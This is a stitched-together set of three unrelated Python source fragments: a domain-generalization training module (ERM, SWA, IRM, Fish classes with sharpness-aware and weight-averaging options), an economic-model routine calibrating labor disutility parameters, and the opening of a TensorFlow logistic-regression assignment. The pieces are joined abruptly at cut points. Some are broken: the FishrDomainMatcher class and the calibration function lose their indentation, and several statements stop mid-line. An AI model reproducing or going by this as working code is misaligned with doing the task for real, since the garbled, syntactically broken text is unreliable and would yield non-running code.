    # "GroupDRO",
    # "Mixup",
    # "MLDG",
    # "CORAL",
    # "COREL",
    # "MMD",
    # "DANN",
    # "CDANN",
    # "MTL",
    # "SagNet",
    # "ARM",
    # "VREx",
    # "VRExema",
    # "RSC",
    # "SD",
    # "ANDMask",
    # "SANDMask",
    # "IGA",
    # "SelfReg",
    # "FisherMMD",
    # "LFF",
    # "KernelDiversity",
    # "EnsembleKernelDiversity",
    "Fishr",
    "Ensembling",
]
def get_algorithm_class(algorithm_name):
    """Return the algorithm class registered under *algorithm_name* in this
    module's global namespace; raise NotImplementedError if absent."""
    module_scope = globals()
    if algorithm_name not in module_scope:
        raise NotImplementedError("Algorithm not found: {}".format(algorithm_name))
    return module_scope[algorithm_name]
class Algorithm(torch.nn.Module):
    """Abstract base class for domain-generalization algorithms.

    Subclasses must implement:
      * update(minibatches, unlabeled=None) -- one optimization step given a
        list of (x, y) tuples, one per training environment; `unlabeled`
        optionally carries test-domain minibatches for domain adaptation.
      * predict(x) -- forward pass producing predictions.
    """
    # Set to True by subclasses that override the forward pass convention.
    CUSTOM_FORWARD = False
    def __init__(self, input_shape, num_classes, num_domains, hparams):
        super().__init__()
        self.input_shape = input_shape
        self.num_classes = num_classes
        self.hparams = hparams
        self.num_domains = num_domains
    def update(self, minibatches, unlabeled=None):
        """Perform one update step; must be provided by subclasses."""
        raise NotImplementedError
    def predict(self, x):
        """Compute predictions for a batch; must be provided by subclasses."""
        raise NotImplementedError
    def get_tb_dict(self):
        """Extra scalars for tensorboard logging; nothing by default."""
        return {}
class ERM(Algorithm):
    """
    Empirical Risk Minimization (ERM)

    Pools all training domains and minimizes average cross-entropy. Two
    optional extensions are controlled through hparams:
      * 'mav' -- maintain a moving average of the network weights
        (misc.MovingAvg) and report its predictions alongside the live net's;
      * 'sam' -- train with a sharpness-aware (SAM) optimizer variant.
    """
    def __init__(self, input_shape, num_classes, num_domains, hparams):
        super(ERM, self).__init__(input_shape, num_classes, num_domains, hparams)
        # Feature extractor + classification head, chained as self.network.
        self.featurizer = networks.Featurizer(input_shape, self.hparams)
        self.classifier = networks.Classifier(
            self.featurizer.n_outputs, num_classes, self.hparams['nonlinear_classifier']
        )
        self.network = nn.Sequential(self.featurizer, self.classifier)
        self._init_mav()
        self._init_optimizer()
    def _init_mav(self):
        # Moving average of weights ("mav"); None disables all mav code paths.
        if self.hparams['mav']:
            self.mav = misc.MovingAvg(self.network)
        else:
            self.mav = None
    def _init_optimizer(self):
        """Build the optimizer: plain Adam, or a SAM wrapper when hparams['sam'] is set."""
        if self.hparams.get('sam'):
            # The adaptive variant uses a 10x larger perturbation radius rho.
            phosam = 10 * self.hparams["phosam"] if self.hparams["samadapt"] else self.hparams[
                "phosam"]
            if self.hparams.get('sam') == "inv":
                # "inverted" SAM: negate rho, perturbing in the opposite direction.
                phosam = - phosam
            if self.hparams.get('sam') == "onlymav":
                # Perturbation computed on the moving-average weights only.
                self.optimizer = sammav.SAMMAV(
                    self.network.parameters(),
                    params_mav=self.mav.network_mav.parameters(),
                    base_optimizer=torch.optim.Adam,
                    adaptive=self.hparams["samadapt"],
                    rho=phosam,
                    lr=self.hparams["lr"],
                    weight_decay=self.hparams["weight_decay"],
                )
            else:
                self.optimizer = sam.SAM(
                    self.network.parameters(),
                    torch.optim.Adam,
                    adaptive=self.hparams["samadapt"],
                    rho=phosam,
                    lr=self.hparams["lr"],
                    weight_decay=self.hparams["weight_decay"],
                )
        else:
            self.optimizer = torch.optim.Adam(
                self.network.parameters(),
                lr=self.hparams["lr"],
                weight_decay=self.hparams["weight_decay"],
            )
    def update(self, minibatches, unlabeled=None):
        """One optimization step over the concatenated domain minibatches.

        NOTE(review): this method indexes self.hparams['sam'] directly while
        _init_optimizer uses .get('sam') -- a missing 'sam' key would raise
        KeyError here; confirm hparams always defines it.
        """
        all_x = torch.cat([x for x, y in minibatches])
        all_classes = torch.cat([y for x, y in minibatches])
        if self.hparams['sam'] == "perdomain":
            # SAM loss computed on one randomly chosen domain per step.
            domain = random.randint(0, self.num_domains - 1)
            loss = F.cross_entropy(self.network(minibatches[domain][0]), minibatches[domain][1])
        elif self.hparams['sam'] == "mav":
            # Cross-entropy on the average of live and (frozen) mav logits.
            predictions = self.network(all_x)
            with torch.no_grad():
                predictions_mav = self.mav.network_mav(all_x)
            loss = F.cross_entropy((predictions + predictions_mav) / 2, all_classes)
        elif self.hparams['sam'] == "mavsam":
            # Weighted live/mav logit mix, rescaled by (1 + mavsamcoeff).
            predictions = self.network(all_x)
            with torch.no_grad():
                predictions_mav = self.mav.network_mav(all_x)
            loss = (1 + self.hparams['mavsamcoeff']) * F.cross_entropy(
                (predictions + self.hparams['mavsamcoeff'] * predictions_mav) /
                (1 + self.hparams['mavsamcoeff']), all_classes
            )
        elif self.hparams['sam'] == "onlymav":
            loss = F.cross_entropy(self.mav.network_mav(all_x), all_classes)
        else:
            loss = F.cross_entropy(self.network(all_x), all_classes)
        output_dict = {'loss': loss}
        if self.hparams['sam']:
            self.optimizer.zero_grad()
            # first forward-backward pass
            loss.backward()
            self.optimizer.first_step(zero_grad=True)
            # second forward-backward pass
            loss_second_step = F.cross_entropy(self.network(all_x), all_classes)
            # make sure to do a full forward pass
            loss_second_step.backward()
            self.optimizer.second_step()
            output_dict["loss_secondstep"] = loss_second_step
        else:
            self.optimizer.zero_grad()
            loss.backward()
            self.optimizer.step()
        if self.hparams['mav']:
            self.mav.update()
        return {key: value.item() for key, value in output_dict.items()}
    def predict(self, x):
        """Return logits keyed by head: always 'net', plus 'mav' when enabled."""
        preds_network = self.network(x)
        if self.hparams['mav']:
            preds_mav = self.mav.network_mav(x)
            results = {"mav": preds_mav, "net": preds_network}
        else:
            results = {"net": preds_network}
        return results
    def eval(self):
        # Also switch the moving-average copy into eval mode.
        Algorithm.eval(self)
        if self.hparams['mav']:
            self.mav.network_mav.eval()
    def train(self, *args):
        # Keep the moving-average copy's train/eval mode in sync.
        Algorithm.train(self, *args)
        if self.hparams['mav']:
            self.mav.network_mav.train(*args)
    def accuracy(self, loader, device):
        """Evaluate accuracy, calibration (ECE) and pairwise prediction
        diversity over *loader*; returns a flat {metric_name: value} dict."""
        self.eval()
        batch_classes = []
        # Per-head accumulators of predictions, confidences and correctness.
        dict_stats = {}
        with torch.no_grad():
            for batch in loader:
                x, y = batch
                x = x.to(device)
                dict_logits = self.predict(x)
                y = y.to(device)
                batch_classes.append(y)
                for key in dict_logits.keys():
                    if key not in dict_stats:
                        dict_stats[key] = {"preds": [], "confs": [], "correct": []}
                    logits = dict_logits[key]
                    try:
                        preds = logits.argmax(1)
                    except:
                        import pdb
                        pdb.set_trace()
                    dict_stats[key]["preds"].append(preds.cpu())
                    dict_stats[key]["confs"].append(logits.max(1)[0].cpu())
                    dict_stats[key]["correct"].append(preds.eq(y).float().cpu())
        # Concatenate per-batch tensors into one tensor per statistic.
        for key0 in dict_stats:
            for key1 in dict_stats[key0]:
                dict_stats[key0][key1] = torch.cat(dict_stats[key0][key1])
        results = {}
        for key in dict_stats:
            results[f"Accuracies/acc_{key}"] = sum(dict_stats[key]["correct"].numpy()
                                                  ) / len(dict_stats[key]["correct"].numpy())
            results[f"Calibration/ece_{key}"] = misc.get_ece(
                dict_stats[key]["confs"].numpy(), dict_stats[key]["correct"].numpy()
            )
        # Pairwise diversity between heads. NOTE(review): the 'mav0'/'net0'/...
        # keys are presumably produced by ensembling subclasses -- confirm.
        for regex in ["mavnet", "mavnet0", "mav01", "net01"]:
            if regex == "mavnet":
                key0 = "mav"
                key1 = "net"
            elif regex == "mavnet0":
                key0 = "mav0"
                key1 = "net0"
            elif regex == "mav01":
                key0 = "mav0"
                key1 = "mav1"
            elif regex == "net01":
                key0 = "net0"
                key1 = "net1"
            else:
                raise ValueError(regex)
            if key0 not in dict_stats:
                continue
            assert key1 in dict_stats
            targets = torch.cat(batch_classes).cpu().numpy()
            preds0 = dict_stats[key0]["preds"].cpu().numpy()
            preds1 = dict_stats[key1]["preds"].cpu().numpy()
            results[f"Diversity/{regex}ratio"] = diversity_metrics.ratio_errors(
                targets, preds0, preds1
            )
            results[f"Diversity/{regex}agre"] = diversity_metrics.agreement_measure(
                targets, preds0, preds1
            )
            # results[f"Diversity/{regex}doublefault"] = diversity_metrics.double_fault(targets, preds0, preds1)
            # results[f"Diversity/{regex}singlefault"] = diversity_metrics.single_fault(targets, preds0, preds1)
            results[f"Diversity/{regex}qstat"] = diversity_metrics.Q_statistic(
                targets, preds0, preds1
            )
        self.train()
        return results
class SWA(ERM):
    """ERM with an optional diversity regularizer computed between the live
    network and its weight moving average ("mav"), treated as two ensemble
    members (hence num_members = 2)."""
    def __init__(self, input_shape, num_classes, num_domains, hparams):
        ERM.__init__(self, input_shape, num_classes, num_domains, hparams)
        # diversifier
        self.features_size = self.featurizer.n_outputs
        self.register_buffer("update_count", torch.tensor([0]))
        self.hparams["num_members"] = 2
        if self.hparams["diversity_loss"] in [None, "none"]:
            self.member_diversifier = None
        else:
            # Registry entry is either a class (instantiated below) or a
            # plain string tag such as "sampling".
            self.member_diversifier = diversity.DICT_NAME_TO_DIVERSIFIER[
                self.hparams["diversity_loss"]]
            if not isinstance(self.member_diversifier, str):
                self.member_diversifier = self.member_diversifier(
                    hparams=self.hparams,
                    features_size=self.features_size,
                    num_classes=self.num_classes,
                    num_domains=num_domains
                )
    def update(self, minibatches, unlabeled=None):
        """One step: per-sample cross-entropy plus (once annealing finishes)
        a diversity term against the frozen moving-average member."""
        bsize = minibatches[0][0].size(0)
        all_x = torch.cat([x for x, y in minibatches])
        all_classes = torch.cat([y for x, y in minibatches])
        all_features = self.featurizer(all_x)
        all_logits = self.classifier(all_features)
        all_loss = F.cross_entropy(all_logits, all_classes, reduction="none")
        output_dict = {'lossmean': all_loss.mean()}
        # Diversity penalty only activates after the annealing period.
        penalty_active = self.update_count >= self.hparams["penalty_anneal_iters"]
        if self.update_count == self.hparams["penalty_anneal_iters"] != 0:
            # Reset Adam as in IRM or V-REx, because it may not like the sharp jump in
            # gradient magnitudes that happens at this step.
            self._init_optimizer()
        self.update_count += 1
        if self.hparams["diversity_loss"] == "sampling":
            assert self.hparams.get("groupdro_eta") != 0
        if self.member_diversifier is not None:
            # The moving-average member is evaluated without gradients.
            with torch.no_grad():
                mav_features = self.mav.get_featurizer()(all_x)
                # NOTE(review): classifies all_features (the live network's
                # features), not mav_features -- looks like either a bug or a
                # deliberate head-only comparison; confirm intent.
                mav_logits = self.mav.get_classifier()(all_features)
                mav_loss = F.cross_entropy(mav_logits, all_classes, reduction="none")
            if self.member_diversifier.diversity_type == "sampling":
                # Reweight per-sample losses using the mav member's losses.
                loss_weighted = self.member_diversifier.compute_weighted_loss(
                    active_loss=all_loss, sampling_loss=mav_loss
                )
                output_dict["lossw"] = loss_weighted
                if penalty_active:
                    objective = loss_weighted
                else:
                    objective = all_loss.mean()
            else:
                # Stack the two members' tensors as (member, domain, batch, ...).
                kwargs = {
                    "features_per_member":
                        torch.stack([all_features, mav_features],
                                    dim=0).reshape(2, self.num_domains, bsize, self.features_size),
                    "logits_per_member":
                        torch.stack([all_logits, mav_logits],
                                    dim=0).reshape(2, self.num_domains, bsize, self.num_classes),
                    "classes":
                        all_classes,
                    "nlls_per_member":
                        torch.stack([all_loss, mav_loss], dim=0).reshape(2, self.num_domains, bsize),
                    # "classifiers": [self.classifier, self.mav.get_classifier()]
                }
                dict_diversity = self.member_diversifier.forward(**kwargs)
                output_dict.update(dict_diversity)
                if penalty_active:
                    objective = all_loss.mean() + dict_diversity["loss_div"] * self.hparams["lambda_diversity_loss"]
                else:
                    objective = all_loss.mean()
        else:
            objective = all_loss.mean()
        self.optimizer.zero_grad()
        objective.backward()
        self.optimizer.step()
        if self.hparams['mav']:
            self.mav.update()
        return {key: value.item() for key, value in output_dict.items()}
class IRM(ERM):
    """Invariant Risk Minimization (IRMv1, Arjovsky et al., 2019)."""
    def __init__(self, input_shape, num_classes, num_domains, hparams):
        super(IRM, self).__init__(input_shape, num_classes, num_domains, hparams)
        # Step counter used to anneal the penalty weight in.
        self.register_buffer("update_count", torch.tensor([0]))
    @staticmethod
    def _irm_penalty(logits, y):
        """IRMv1 penalty: dot product of the gradients (w.r.t. a dummy
        classifier scale of 1.0) of the cross-entropy on the even-indexed and
        odd-indexed halves of the batch."""
        device = "cuda" if logits[0][0].is_cuda else "cpu"
        dummy_scale = torch.tensor(1.0).to(device).requires_grad_()
        loss_even = F.cross_entropy(logits[::2] * dummy_scale, y[::2])
        loss_odd = F.cross_entropy(logits[1::2] * dummy_scale, y[1::2])
        grad_even = autograd.grad(loss_even, [dummy_scale], create_graph=True)[0]
        grad_odd = autograd.grad(loss_odd, [dummy_scale], create_graph=True)[0]
        return torch.sum(grad_even * grad_odd)
    def update(self, minibatches, unlabeled=None):
        """One step of ERM loss plus the IRM penalty, averaged over domains."""
        device = "cuda" if minibatches[0][0].is_cuda else "cpu"
        # Penalty weight is 1.0 during annealing, then jumps to irm_lambda.
        penalty_weight = (
            self.hparams["irm_lambda"]
            if self.update_count >= self.hparams["irm_penalty_anneal_iters"] else 1.0
        )
        nll = 0.0
        penalty = 0.0
        all_x = torch.cat([x for x, y in minibatches])
        all_logits = self.network(all_x)
        offset = 0
        # Slice the concatenated logits back into per-domain chunks.
        for i, (x, y) in enumerate(minibatches):
            domain_logits = all_logits[offset:offset + x.shape[0]]
            offset += x.shape[0]
            nll += F.cross_entropy(domain_logits, y)
            penalty += self._irm_penalty(domain_logits, y)
        nll /= len(minibatches)
        penalty /= len(minibatches)
        loss = nll + (penalty_weight * penalty)
        if self.update_count == self.hparams["irm_penalty_anneal_iters"]:
            # Reset Adam, because it doesn't like the sharp jump in gradient
            # magnitudes that happens at this step.
            self.optimizer = torch.optim.Adam(
                self.network.parameters(),
                lr=self.hparams["lr"],
                weight_decay=self.hparams["weight_decay"],
            )
        self.optimizer.zero_grad()
        loss.backward()
        self.optimizer.step()
        self.update_count += 1
        return {"loss": loss.item(), "nll": nll.item(), "penalty": penalty.item()}
class Fish(ERM):
    """
    Implementation of Fish, as seen in Gradient Matching for Domain
    Generalization, Shi et al. 2021.
    """
    def __init__(self, input_shape, num_classes, num_domains, hparams):
        super(Fish, self).__init__(input_shape, num_classes, num_domains, hparams)
        # NOTE(review): Algorithm.__init__ is re-run after ERM's and the
        # network is replaced by WholeFish -- presumably to discard ERM's
        # featurizer/classifier split while keeping ERM's helpers; confirm.
        Algorithm.__init__(self, input_shape, num_classes, num_domains, hparams)
        self.network = networks.WholeFish(input_shape, num_classes, hparams)
        self._init_optimizer()
        # Inner-loop optimizer state, carried across update() calls.
        self.optimizer_inner_state = None
        self._init_mav()
    def create_clone(self, device):
        # Fresh inner copy of the network (same weights) with its own Adam;
        # previous inner optimizer state is restored if available.
        self.network_inner = networks.WholeFish(
            self.input_shape, self.num_classes, self.hparams, weights=self.network.state_dict()
        ).to(device)
        self.optimizer_inner = torch.optim.Adam(
            self.network_inner.parameters(),
            lr=self.hparams["lr"],
            weight_decay=self.hparams["weight_decay"],
        )
        if self.optimizer_inner_state is not None:
            self.optimizer_inner.load_state_dict(self.optimizer_inner_state)
    def fish(self, meta_weights, inner_weights, lr_meta):
        # Reptile-style outer update: move the meta weights a fraction
        # lr_meta of the way toward the inner-loop weights.
        meta_weights = misc.ParamDict(meta_weights)
        inner_weights = misc.ParamDict(inner_weights)
        meta_weights += lr_meta * (inner_weights - meta_weights)
        return meta_weights
    def update(self, minibatches, unlabeled=None):
        """Sequential inner SGD across the domain minibatches, then one meta
        (outer) interpolation step.

        NOTE(review): the returned 'loss' is the *last* domain's inner loss,
        and an empty minibatches list would raise NameError on it.
        """
        self.create_clone(minibatches[0][0].device)
        for x, y in minibatches:
            loss = F.cross_entropy(self.network_inner(x), y)
            self.optimizer_inner.zero_grad()
            loss.backward()
            self.optimizer_inner.step()
        self.optimizer_inner_state = self.optimizer_inner.state_dict()
        meta_weights = self.fish(
            meta_weights=self.network.state_dict(),
            inner_weights=self.network_inner.state_dict(),
            lr_meta=self.hparams["meta_lr"],
        )
        self.network.reset_weights(meta_weights)
        if self.hparams['mav']:
            self.mav.update()
        return {"loss": loss.item()}
class FishrDomainMatcher():
def __init__(self, hparams, optimizer, num_domains):
self.hparams = hparams
self.optimizer = optimizer
self.num_domains = num_domains
self.loss_extended | |
'''
AUTHORS: <NAME> and <NAME>
DATE: March 22, 2019
COPYRIGHT MARCH 22, 2019 <NAME> AND <NAME>
'''
from __future__ import print_function
'''
This module should be organized as follows:
Main function:
chi_estimate() = returns chi_n, chi_b
- calls:
wealth.get_wealth_data() - returns data moments on wealth distribution
labor.labor_data_moments() - returns data moments on labor supply
minstat() - returns min of statistical objective function
model_moments() - returns model moments
SS.run_SS() - return SS distributions
'''
'''
------------------------------------------------------------------------
Last updated: 7/27/2016
Uses a simulated method of moments to calibrate the chi_n and chi_b
parameters of OG-USA.
This py-file calls the following other file(s):
wealth.get_wealth_data()
labor.labor_data_moments()
SS.run_SS
This py-file creates the following other file(s): None
------------------------------------------------------------------------
'''
import numpy as np
import scipy.optimize as opt
import scipy.interpolate as si
import pandas as pd
import os
try:
import cPickle as pickle
except ImportError:
import pickle
from . import wealth
from . import labor
from . import SS
from . import utils
from ogusa import aggregates as aggr
from ogusa import SS
def chi_n_func(s, a0, a1, a2, a3, a4):
    """Evaluate the quartic polynomial a0 + a1*s + a2*s^2 + a3*s^3 + a4*s^4
    (element-wise when s is an array)."""
    coefficients = (a0, a1, a2, a3, a4)
    return sum(coef * s ** power for power, coef in enumerate(coefficients))
def chebyshev_func(x, a0, a1, a2, a3, a4):
    """Evaluate the degree-4 Chebyshev series with coefficients a0..a4 at x
    (scalar or array), using numpy's Chebyshev evaluator."""
    coefficients = [a0, a1, a2, a3, a4]
    return np.polynomial.chebyshev.chebval(x, coefficients)
def find_moments(p, client):
    """Solve the model steady state for parameters *p* and return the model
    labor-supply moments (mean labor by age over the first 45 ages).

    :param p: model parameter object (S, J, ltilde, mindist_SS, alpha_T, ...)
    :param client: dask client (or None) forwarded to the SS solvers
    :return: length-45 array of labor moments, or the scalar 1e10 when the
        steady-state solver fails (error sentinel used by the calibration
        loop; note the inconsistent return type is relied upon upstream)
    """
    b_guess = np.ones((p.S, p.J)) * 0.07
    n_guess = np.ones((p.S, p.J)) * .4 * p.ltilde
    rguess = 0.08961277823002804  # 0.09
    T_Hguess = 0.12
    factorguess = 12.73047710050195  # 7.7 #70000 # Modified
    BQguess = aggr.get_BQ(rguess, b_guess, None, p, 'SS', False)
    exit_early = [0, -1]  # 2nd value gives number of valid labor moments to consider before exiting SS_fsolve
    # Put -1 to run to SS
    ss_params_baseline = (b_guess, n_guess, None, None, p, client, exit_early)
    guesses = [rguess] + list(BQguess) + [T_Hguess, factorguess]
    [solutions_fsolve, infodict, ier, message] =\
        opt.fsolve(SS.SS_fsolve, guesses, args=ss_params_baseline,
                   xtol=p.mindist_SS, full_output=True)
    # Unpack the fsolve solution vector: [r, BQ..., T_H, factor].
    rss = solutions_fsolve[0]
    BQss = solutions_fsolve[1:-2]
    T_Hss = solutions_fsolve[-2]
    factor_ss = solutions_fsolve[-1]
    Yss = T_Hss/p.alpha_T[-1]
    fsolve_flag = True
    try:
        output = SS.SS_solver(b_guess, n_guess, rss, BQss, T_Hss,
                              factor_ss, Yss, p, client, fsolve_flag)
    except Exception:
        # Narrowed from a bare `except:` so Ctrl-C / SystemExit still
        # propagate; solver failures keep the documented 1e10 sentinel.
        print('RuntimeError: Steady state aggregate resource constraint not satisfied')
        print('Luckily we caught the error, so minstat_init_calibrate will continue')
        return 1e10
    model_moments = np.array(output['nssmat'].mean(axis=1)[:45])  # calc_moments(output, p.omega_SS, p.lambdas, p.S, p.J)
    return model_moments
def chi_estimate(p, client=None):
'''
COPYRIGHT MARCH 22, 2019 <NAME> AND <NAME>
'''
# Generate labor data moments
labor_hours = np.array([167, 165, 165, 165, 165, 166, 165, 165, 164])#, 166, 164])
labor_part_rate = np.array([0.69, 0.849, 0.849, 0.847, 0.847, 0.859, 0.859, 0.709, 0.709])#, 0.212, 0.212])
employ_rate = np.array([0.937, 0.954, 0.954, 0.966, 0.966, 0.97, 0.97, 0.968, 0.968])#, 0.978, 0.978])
labor_hours_adj = labor_hours * labor_part_rate * employ_rate
labor_moments = labor_hours_adj * 12 / (365 * 17.5)
data_moments_trunc = np.array(list(labor_moments.flatten()))
#ages = np.array([20, 25, 30, 35, 40, 45, 50, 55, 60]) + 2.5
#labor_fun = si.splrep(ages, data_moments_trunc)
#ages_full = np.linspace(21, 65, p.S // 2 + 5)
#data_moments = si.splev(ages_full, labor_fun)
data_moments = np.repeat(data_moments_trunc, 5) # Set labor values to equal average over bin
# a0 = 1.25108169e+03
# a1 = -1.19873316e+02
# a2 = 2.20570513e+00
# a3 = -1.76536132e-02
# a4 = 5.19262962e-05
# chi_n = np.ones(p.S)
# chi_n[:p.S // 2 + 5] = chebyshev_func(ages_full, a0, a1, a2, a3, a4)
# slope = chi_n[p.S // 2 + 5 - 1] - chi_n[p.S // 2 + 5 - 2]
# chi_n[p.S // 2 + 5 - 1:] = (np.linspace(65, 100, 36) - 65) * slope + chi_n[p.S // 2 + 5 - 1]
# chi_n[chi_n < 0.5] = 0.5
chi_n = pickle.load(open("chi_n.p", "rb"))
p.chi_n = chi_n
model_moments = find_moments(p, client)
labor_below = np.zeros(p.S // 2 + 5)
labor_above = np.ones(p.S // 2 + 5) * np.inf
chi_below = np.zeros(p.S // 2 + 5)
chi_above = np.zeros(p.S // 2 + 5)
chi_prev = np.zeros(p.S // 2 + 5)
consec_above = np.zeros(p.S // 2 + 5)
consec_below = np.zeros(p.S // 2 + 5)
print('About to start the while loop')
eps_val = 0.001
#still_calibrate = ((abs(model_moments - data_moments) > eps_val) & (chi_n[:45] > 0.5))\
# | ((chi_n[:45] <= 0.5) & (labor_above > data_moments))
still_calibrate = (abs(model_moments - data_moments) > eps_val) & ((chi_n[:45] > 0.5)\
| ((chi_n[:45] <= 0.5) & (labor_above > data_moments)))
moments_calibrated_per_step = []
while still_calibrate.any():
### Check that 2 consecutive chi_n estimates aren't equal
if (chi_n[:45] == chi_prev).all():
raise RuntimeError('Calibration failure. No chi_n values changed between guesses')
chi_prev = np.copy(chi_n[:45])
### Set above/below arrays based on model moments
above_data_below_above = (model_moments > data_moments) #& (model_moments < labor_above)
below_data_above_below = (model_moments < data_moments) #& (model_moments > labor_below)
# Had to comment out checking if closer than previous guess because if
# the result moves, the convex combination might be outside the range
# and it gets stuck in an infinite loop because the guess never improves
labor_above[above_data_below_above] = model_moments[above_data_below_above]
chi_above[above_data_below_above] = chi_n[:45][above_data_below_above]
labor_below[below_data_above_below] = model_moments[below_data_above_below]
chi_below[below_data_above_below] = chi_n[:45][below_data_above_below]
### Set consecutive above/below values
consec_above[above_data_below_above] += 1
consec_above[below_data_above_below] = 0
consec_below[below_data_above_below] += 1
consec_below[above_data_below_above] = 0
consec = (consec_above >= 4) | (consec_below >= 4)
### Create arrays for labor boundaries
print(str(np.sum(still_calibrate)) + ' labor moments are still being calibrated')
moments_calibrated_per_step.append(np.sum(still_calibrate))
print('Moments calibrated at each iteration (including this iteration):')
print(moments_calibrated_per_step)
both = (((labor_below > 0) & (labor_above < np.inf)) |\
((labor_below == 0) & (labor_above == np.inf))) & (still_calibrate)
above = (labor_below == 0) & (labor_above < np.inf) & (still_calibrate)
below = (labor_below > 0) & (labor_above == np.inf) & (still_calibrate)
print(str(np.sum(both)) + ' labor moments are being convexly shifted')
print(str(np.sum(above)) + ' labor moments are being shifted down')
print(str(np.sum(below)) + ' labor moments are being shifted up')
### Calculate convex combination factor
above_dist = abs(labor_above - data_moments)
below_dist = abs(data_moments - labor_below)
total_dist = above_dist + below_dist
above_factor = below_dist / total_dist
below_factor = above_dist / total_dist
#### Adjust by convex combination factor
chi_n[:45][both] = np.copy(below_factor[both] * chi_below[both] +\
above_factor[both] * chi_above[both])
invalid_factor = np.isnan(chi_n[:45][both]) # Modified
chi_n[:45][both][invalid_factor] = np.copy(0.5 * (chi_below[both][invalid_factor] + chi_above[both][invalid_factor])) # Modified
### Adjust values that aren't bounded both above and below by labor error factors
error_factor = model_moments / data_moments
chi_n[:45][above] = np.copy(np.minimum(error_factor[above] * chi_above[above], 1.02 * chi_above[above]))#np.copy(1.02 * chi_above[above])
chi_n[:45][below] = np.copy(np.maximum(error_factor[below] * chi_below[below], 0.98 * chi_below[below]))#np.copy(0.98 * chi_below[below])
### Solve moments using new chi_n guesses
p.chi_n = chi_n
model_moments = find_moments(p, client)
print('-------------------------------')
print('New model moments:')
print(list(model_moments))
print('Chi_n:')
print(list(chi_n))
print('-------------------------------')
print('Labor moment differences:')
print(model_moments[still_calibrate] - data_moments[still_calibrate])
print('-------------------------------')
### Redefine still_calibrate and both based on new model moments
still_calibrate = (abs(model_moments - data_moments) > eps_val) & ((chi_n[:45] > 0.5)\
| ((chi_n[:45] <= 0.5) & (labor_above > data_moments)))
both = (((labor_below > 0) & (labor_above < np.inf)) |\
((labor_below == 0) & (labor_above == np.inf))) & (still_calibrate)
print('Chi differences:')
print(chi_below[still_calibrate] - chi_above[still_calibrate])
print('-------------------------------')
print('Chi below:')
print(chi_below[still_calibrate])
print('-------------------------------')
print('Chi above:')
print(chi_above[still_calibrate])
print('-------------------------------')
print('Labor above:')
print(labor_above[still_calibrate])
print('-------------------------------')
print('Labor below:')
print(labor_below[still_calibrate])
print('-------------------------------')
### Fix stuck boundaries
#still_calibrate_stuck_1 = ((abs(model_moments - data_moments) > eps_val) & (chi_n[:45] > 0.5))\
#| ((chi_n[:45] <= 0.5) & (labor_above > data_moments))
#still_calibrate_stuck_2 = ((abs(model_moments - data_moments) > 10 * eps_val) & (chi_n[:45] > 0.5))\
#| ((chi_n[:45] <= 0.5) & (labor_above > data_moments))
#stuck_1 = ((chi_below - chi_above) < 10 * eps_val) & (still_calibrate_stuck_1)
#stuck_2 = ((chi_below - chi_above) < 1e3 * eps_val) & (still_calibrate_stuck_2)
#stuck = (stuck_1) | (stuck_2)
stuck = ((chi_below - chi_above) < 10) & (consec) & (both)
if (stuck).any():
consec_above[stuck] = 0
consec_below[stuck] = 0
check_above_stuck = (stuck) & (model_moments > data_moments)
check_below_stuck = (stuck) & (model_moments < data_moments)
print(str(np.sum(check_above_stuck)) + ' labor moments are being checked to see if they are too high')
print(str(np.sum(check_below_stuck)) + ' labor moments are being checked to see if they are too low')
### Make sure chi_n bounds are still valid
check_chi_n = chi_n.copy()
check_chi_n[:45][check_above_stuck] = np.copy(chi_below[check_above_stuck])
check_chi_n[:45][check_below_stuck] = np.copy(chi_above[check_below_stuck])
p.chi_n = check_chi_n
check_model_moments = find_moments(p, client)
above_stuck = (check_above_stuck) & (check_model_moments > data_moments)
below_stuck = (check_below_stuck) & (check_model_moments < data_moments)
print(str(np.sum(above_stuck)) + ' labor moments are being unstuck from being too high')
print(str(np.sum(below_stuck)) + ' labor moments are being unstuck from being too low')
total_stuck = str(np.sum(above_stuck) + np.sum(below_stuck))
moments_calibrated_per_step.append(str(np.sum(stuck)) + '(checked) ' + total_stuck | |
# File: assignment_03_regularization.py
"""
Udacity Deep Learning course by Google.
Assignment #03: various regularization techniques.
"""
import os
import sys
import time
import logging
import argparse
from os.path import join
import numpy as np
import tensorflow as tf
from tensorflow.contrib.data import Dataset
from utils import *
from dnn_utils import *
from dataset_utils import *
logger = logging.getLogger(os.path.basename(__file__)) # pylint: disable=invalid-name
SUMMARY_FOLDER = './.summary'
SAVER_FOLDER = './.sessions'
def parse_args(argv=None):
    """Parse command line args using argparse.

    :param argv: optional list of argument strings; defaults to sys.argv[1:]
        when None (backward compatible with the original no-arg call).
    :return: argparse.Namespace with a boolean `sanitized` attribute
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--sanitized',
        action='store_true',
        help='Use sanitized version of the test and validation datasets',
    )
    return parser.parse_args(argv)
def train_logistic_classifier(train_dataset, train_labels, test_dataset, test_labels, params):
    """Standard logistic classifier with no nonlinearity.

    Trains a single softmax layer with SGD and L2 weight decay for 10001
    minibatch steps, logging batch loss/accuracy every 500 steps.

    :param train_dataset: 2D array of flattened images, one sample per row
        (assumes width IMAGE_RES * IMAGE_RES -- TODO confirm against loader)
    :param train_labels: one-hot label matrix aligned with train_dataset
    :param test_dataset: held-out samples in the same layout
    :param test_labels: one-hot labels for test_dataset
    :param params: dict with optional 'learning_rate' and 'weight_decay' keys
    :return: accuracy on the test dataset as computed by calc_accuracy
    """
    batch_size = 128
    learning_rate = params.get('learning_rate', 0.5)
    reg_coeff = params.get('weight_decay', 0.00001)
    # Hoisted out of the training loop: the original reassigned this constant
    # on every iteration for no reason.
    verbose = True
    graph = tf.Graph()
    with graph.as_default():
        tf_train_dataset = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES))
        tf_train_labels = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES))
        tf_test_dataset = tf.constant(test_dataset)
        weights = tf.Variable(tf.truncated_normal([IMAGE_RES * IMAGE_RES, NUM_CLASSES]))
        biases = tf.Variable(tf.zeros([NUM_CLASSES]))
        logits = tf.matmul(tf_train_dataset, weights) + biases
        unregularized_loss = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits),
        )
        # L2 weight decay is applied to the weight matrix only; biases are
        # deliberately left unregularized.
        l2_loss = reg_coeff * l2(weights)
        loss = unregularized_loss + l2_loss
        optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)
        train_prediction = tf.nn.softmax(logits)
        test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
